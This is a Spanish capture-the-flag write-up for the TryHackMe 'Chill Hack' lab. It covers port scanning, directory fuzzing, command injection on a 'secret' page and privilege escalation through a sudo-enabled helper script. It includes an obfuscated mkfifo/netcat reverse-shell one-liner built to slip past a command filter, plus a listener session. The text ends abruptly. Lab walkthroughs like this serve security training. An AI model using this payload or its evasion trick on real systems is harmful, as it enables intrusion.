> For the complete documentation index, see [llms.txt](https://enciall.gitbook.io/enciall/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://enciall.gitbook.io/enciall/ctf/try-hack-me/chill-hack.md).

# Chill hack

### Iniciamos con un escaneo rápido para identificar los puertos abiertos:

```sh
nmap -p- -sS -sV -sC --open --min-rate 5000 -vvv -n -Pn 10.10.93.60
```

```bash
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 61 vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.53.219
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 cc:2a:66:00:1c:29:61:0f:d4:ff:5d:6f:59:90:07:9e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1zJiqOucBq4woA5maVHLI5MEp2Ud6FJVgxYolXEe5uuD3rI0+JjhIUYmJYzP6LObNyC9p22EJZX6hviUeC+oKexHMnwk3acH9ZLs8tHukl+JtdFsm/5mrtAsEbBNQtqb/J+wEpnIOjRLjqUNOMYpio6/fzFwA8Yn6ZWzd9OGhrAWbp4NUrRHjoQOXp26j2SXABBRed9pngeZd6GUdGVegAT3vdwMx0arN1PFWs/PH9FXXJJDu5gIQFp8TX5ocnJQNgJuW/kzNmEEA9OLpwPnospAig7lkM4JvVKWmF08zKFzQmKos7ZkwkZ7xEKpVwi3nfu0s+bMTjqOKxnFAKXNTXRNN3hRnvyhoWobArlhiMsnB5tqrb/yr3qpkFqGmk+vlbFyl8Qs7SOe3vDouAdzsZIA5IZkstEi23YxJ3Ri++5gB1pnu2zK8VJS+luDShprtkHK1AfiQmZh7ow4nEim34afxxsKPZB4wCE+gTr/hxnsCSCH3u9K/RtDo6L8cSYs=
|   256 86:45:73:30:df:f7:85:37:69:ad:b9:7d:d3:14:04:73 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLUeChBNWG/TfFabwZfkn9ZwYHxzEvw3kevC3a46rB5MOhJ4m8W8RfABtp0JTwg1Su8IHw9gomYvu/DNwlHXefI=
|   256 06:14:f7:19:6d:92:83:6f:e7:36:12:62:ad:95:e0:a9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIqFQcyjhBvf7YLAEK2a/xfztRQd+MAMAtNk1xqGSBjO
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-title: Game Info
|_http-favicon: Unknown favicon MD5: 7EEEA719D1DF55D478C68D9886707F17
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

```

si vamos a la web vemos esto

<figure><img src="/files/9qP4rgVGw3ybbUkANycM" alt=""><figcaption></figcaption></figure>

no encontramos mucho asi que vamos a hacer fuzzing

```sh
ffuf -u http://10.10.93.60/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.sh,.html
```

```
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.93.60/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php .sh .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

about.html              [Status: 200, Size: 21339, Words: 9838, Lines: 338, Duration: 153ms]
contact.php             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 215ms]
contact.html            [Status: 200, Size: 18301, Words: 8553, Lines: 307, Duration: 208ms]
blog.html               [Status: 200, Size: 30279, Words: 15218, Lines: 544, Duration: 143ms]
index.html              [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 4015ms]
news.html               [Status: 200, Size: 19718, Words: 9096, Lines: 331, Duration: 4154ms]
images                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 5026ms]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 131ms]
team.html               [Status: 200, Size: 19868, Words: 9364, Lines: 359, Duration: 141ms]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 132ms]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 134ms]
secret                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 131ms]
```

vemos algo interesante secret vemos que hay&#x20;

<figure><img src="/files/1dcKgL2DLlQjZwL9GzU6" alt=""><figcaption></figcaption></figure>

vemos que podemos ejecutar comandos asi que tratamos de obtener una web shell pero no nos deja asi que lo ofuscamos

```
r${obz}m /tmp/f;mkfifo /tmp/f;ca${neko}t /tmp/f|/bin/s${neko}h -i 2>&1|n${obz}c IP PUERTO >/tmp/f
```

modifica IP por tu ip la de la VPN y el PUERTO por el que eligas ahora hacemos&#x20;

```sh
nc -nlvp 443
```

```bash
listening on [any] 443 ...
connect to [10.6.53.219] from (UNKNOWN) [10.10.93.60] 59174
/bin/sh: 0: can't access tty; job control turned off
$ ls
images
index.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
```

ahora arreglamos la tty operativa

```sh
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

hacemos sudo -l para ver que permisos tiene www-data

```bash
www-data@ip-10-10-93-60:/var/www/html/secret$ sudo -l
sudo -l
Matching Defaults entries for www-data on ip-10-10-93-60:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-93-60:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ip-10-10-93-60:/var/www/html/secret$ 
```

vemos que podemos ejecutar sin contraseña un script con el usuario apaar asi que vamos a convertirnos en apaar

```sh
sudo -u apaar /home/apaar/.helpline.sh
```

```bash
www-data@ip-10-10-93-60:/var/www/html/secret$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
www-data@ip-10-10-93-60:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh
<html/secret$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: bash
bash
Hello user! I am bash,  Please enter your message: bash
bash
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
```

nuevamente arreglamos la tty operativa

```sh
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

investigando encontre un directorio en /var/www/ llamado files donde habia un index.php con algo interesante

```html
<html>
<body>
<?php
        if(isset($_POST['submit']))
        {
                $username = $_POST['username'];
                $password = $_POST['password'];
                ob_start();
                session_start();
                try
                {
                        $con = new PDO("mysql:dbname=webportal;host=localhost","XXXX","XXXXXXXXXXXXX");
                        $con->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_WARNING);
                }
                catch(PDOException $e)
                {
                        exit("Connection failed ". $e->getMessage());
                }
                require_once("account.php");
                $account = new Account($con);
                $success = $account->login($username,$password);
                if($success)
                {
                        header("Location: hacker.php");
                }
        }
?>
<link rel="stylesheet" type="text/css" href="style.css">
        <div class="signInContainer">
                <div class="column">
                        <div class="header">
                                <h2 style="color:blue;">Customer Portal</h2>
                                <h3 style="color:green;">Log In<h3>
                        </div>
                        <form method="POST">
                                <?php echo $success?>
                                <input type="text" name="username" id="username" placeholder="Username" required>
                                <input type="password" name="password" id="password" placeholder="Password" required>
                                <input type="submit" name="submit" value="Submit">
                        </form>
                </div>
        </div>
</body>
</html>

```

contraseña de root&#x20;
